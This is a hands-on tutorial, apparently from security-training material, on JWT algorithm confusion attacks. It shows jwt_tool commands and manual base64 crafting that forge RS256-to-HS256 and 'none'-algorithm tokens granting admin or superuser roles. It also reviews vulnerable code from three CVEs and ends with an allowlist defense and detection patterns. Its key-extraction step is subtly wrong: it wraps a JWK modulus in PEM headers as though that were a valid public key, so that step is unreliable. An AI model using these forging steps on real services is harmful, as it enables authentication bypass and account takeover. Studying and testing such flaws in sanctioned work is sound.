Algorithm Confusion Exploits
JWT Algorithm Confusion: Complete Authentication Bypass
What You'll Discover
🎯 Why This Matters
Algorithm confusion attacks are one of those "holy grail" vulnerabilities that can completely bypass authentication in major applications. Here's the thing: JWTs trust their own headers to say which algorithm to use for verification. Attackers exploit this trust by changing the algorithm field, tricking servers into verifying signatures the wrong way. You'll learn to spot and exploit these flaws just like the security researchers who discover them.
🔍 What You'll Learn
You'll discover how to trick servers into using RSA public keys as HMAC secrets (RS256 to HS256 attacks), completely bypass signature verification with "none" algorithm attacks, and use powerful tools like jwt_tool to automate the testing. These are the same techniques that researchers use to find critical vulnerabilities in production systems.
🚀 Your First Win
Within minutes, you'll be testing JWT tokens for algorithm confusion vulnerabilities using the same tools that security researchers rely on. You'll immediately see these attacks in action and gain the confidence to spot vulnerable implementations that even experienced developers miss.
🔧 Try This Right Now
Let's get jwt_tool running - it's the tool that security researchers worldwide use for JWT testing. This thing automates all the complex cryptographic work that would take you hours to do by hand.
# Step 1: Install cryptographic dependencies
pip3 install pycryptodome
# Step 2: Get jwt_tool (enterprise-grade JWT testing framework)
git clone https://github.com/ticarpi/jwt_tool.git
cd jwt_tool
# Step 3: Test algorithm confusion with this vulnerable example token
python3 jwt_tool.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsIm5hbWUiOiJKb2huIERvZSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c -X a
# What this does:
# ✓ Tests none algorithm bypass attacks
# ✓ Tests RS256→HS256 key confusion attacks
# ✓ Tests blank password vulnerabilities
# ✓ Generates exploit payloads automaticallyYou'll see: jwt_tool will automatically test multiple algorithm confusion attacks and provide detailed results showing which vulnerabilities exist, complete with ready-to-use exploit tokens - giving you instant insight into the target application's security posture.
Skills You'll Gain
✅ Core Understanding
- How these attacks work at the cryptographic level (no more black box mystery!)
- The exact same exploitation techniques that researchers use in the wild
- Powerful tools like jwt_tool that automate complex testing
- The knowledge that separates script kiddies from real security experts
🔍 Real-World Skills
- Spotting vulnerable JWT implementations in actual applications
- Using the same tools that security researchers rely on daily
- Understanding attack patterns to build bulletproof defenses
- Explaining security findings clearly to developers and teams
RS256 to HS256 Downgrade Attack
The RS256 to HS256 attack exploits servers that accept both asymmetric (RSA) and symmetric (HMAC) algorithms
This attack vector represents one of the most severe JWT vulnerabilities, affecting multiple major JWT libraries according to Auth0's 2015 security research. Security experts use this technique to demonstrate complete authentication bypass against vulnerable implementations.
Attack Prerequisites
What you need for successful testing
✓ Access to server's public RSA key
✓ Valid JWT token using RS256 algorithm
✓ Target server accepts HS256 algorithm
✓ No strict algorithm validationKey Discovery Methods
Proven techniques for locating public keys
# Common JWKS endpoints
/.well-known/jwks.json
/api/auth/keys
/oauth/.well-known/jwks
# Certificate extraction
openssl s_client -connect example.com:443⚡ Real-World Exploitation Example
This is the exact methodology that security consultants use in testing engagements
# Step 1: Discover and extract public key
curl https://example.com/.well-known/jwks.json | jq .
curl https://example.com/.well-known/jwks.json | python3 -c "import sys,json; key=json.load(sys.stdin)['keys'][0]; print('-----BEGIN PUBLIC KEY-----'); print(key['n']); print('-----END PUBLIC KEY-----')" > public_key.pem
# Step 2: Create malicious HS256 token using RSA key as HMAC secret
python3 jwt_tool.py [ORIGINAL_TOKEN] -X s -pk public_key.pem -I -pc role -pv admin
# Step 3: Test forged token for authentication bypassSuccess Indicator: Complete authentication bypass with ability to forge any user identity - the same impact achieved by security teams during assessments.
None Algorithm Attack
The none algorithm attack completely bypasses signature verification by setting the algorithm to "none" and removing the signature entirely. This technique requires no cryptographic knowledge - success depends entirely on identifying server-side validation failures.
Manual Token Crafting
Hand-crafted techniques for signature bypass
# Create none algorithm header
echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr '+/' '-_' | tr -d '='
# Create malicious payload
echo -n '{"sub":"admin","role":"superuser"}' | base64 | tr '+/' '-_' | tr -d '='
# Combine with empty signature
HEADER.PAYLOAD.Automated Tools
Industry-standard automation for comprehensive testing
# Automated none algorithm attack
python3 jwt_tool.py [TOKEN] -X n
# Custom payload injection with tamper mode
python3 jwt_tool.py [TOKEN] -T
# Select: none algorithm
# Modify payload: {"sub":"admin","permissions":["*"]}
# Ignore verification failures (continue testing even if some steps fail)
python3 jwt_tool.py [TOKEN] -X n -IReal-World Vulnerabilities
These are actual CVE-documented vulnerabilities that security experts have identified in production systems. All references are verified against official sources including MITRE CVE database and vendor security advisories.
CVE-2024-54150: CJWT Algorithm Confusion
Library: xmidt-org/cjwt (C JSON Web Token Implementation)
CVSS Score: 9.1 Critical | Discovery: December 2024 by Louis Nyffenegger (@PentesterLab)
// Vulnerable code pattern in cjwt library
int cjwt_decode(const char *encoded, size_t encoded_len,
const uint8_t *key, size_t key_len,
cjwt_t **jwt) {
// Algorithm taken from untrusted header - VULNERABLE!
const char *alg = cJSON_GetStringValue(
cJSON_GetObjectItemCaseSensitive(header, "alg"));
// No algorithm validation before key usage
}Impact: Complete authentication bypass when RS256 expected but HS256 provided. CVE-2024-54150 | GitHub Security Advisory
CVE-2022-29217: PyJWT Key Confusion
Library: jpadilla/pyjwt (Python JWT Library) | CVSS Score: 7.4 High
Affected Versions: >= 1.5.0, < 2.4.0
# Vulnerable key validation in PyJWT
invalid_strings = [
b"-----BEGIN PUBLIC KEY-----",
b"ssh-rsa", # Only RSA keys blocked
b"-----BEGIN RSA PUBLIC KEY-----",
]
# Ed25519 keys starting with "ssh-ed25519" bypass validation
# ECDSA keys "ecdsa-sha2-nistp256" also bypass validationImpact: Ed25519 and ECDSA public keys can be used as HMAC secrets. NVD CVE-2022-29217 | GitHub Security Advisory
CVE-2016-10555: JWT-Simple Historic Case
Historical Significance: First widely documented JWT algorithm confusion vulnerability (March 2015)
Industry Impact: Led to RFC 8725 JWT Best Practices specification
// Historical vulnerable pattern in jwt-simple
exports.decode = function decode(token, key, noVerify, algorithm) {
// Algorithm parameter ignored, taken from header instead
var header = jwt.getHeader(token);
var alg = header.alg; // DANGEROUS: Attacker controlled
if (alg === 'HS256') {
return verify(token, key, 'HS256'); // Uses RSA key as HMAC secret
}
};Legacy Impact: Spawned industry-wide JWT security review and improved library implementations. CVE-2016-10555
Defense Strategies
These are the same security implementation practices used by enterprise security teams and recommended by industry standards organizations.
Algorithm Allowlist Enforcement
Industry-standard secure implementation patterns
// Secure JWT verification
const ALLOWED_ALGORITHMS = ['RS256'];
function secureJWTVerify(token, publicKey) {
return jwt.verify(token, publicKey, {
algorithms: ALLOWED_ALGORITHMS,
clockTolerance: 30
});
}Security Monitoring
Monitoring for algorithm confusion attempts
# Detection patterns
suspicious_patterns = [
'alg":"none"', # None algorithm
'alg":"HS256"', # Unexpected HMAC
'alg":"NONE"', # Case variation
'alg":""', # Empty algorithm
]
# Real-time monitoring implementation🎯 Your Algorithm Confusion Expertise is Complete!
You now understand JWT algorithm confusion attacks like a security expert. You can execute RS256 to HS256 downgrade attacks, perform none algorithm bypasses, and know how to implement secure JWT validation that prevents these critical vulnerabilities.
Ready to Apply Your Skills to Advanced JWT Security Testing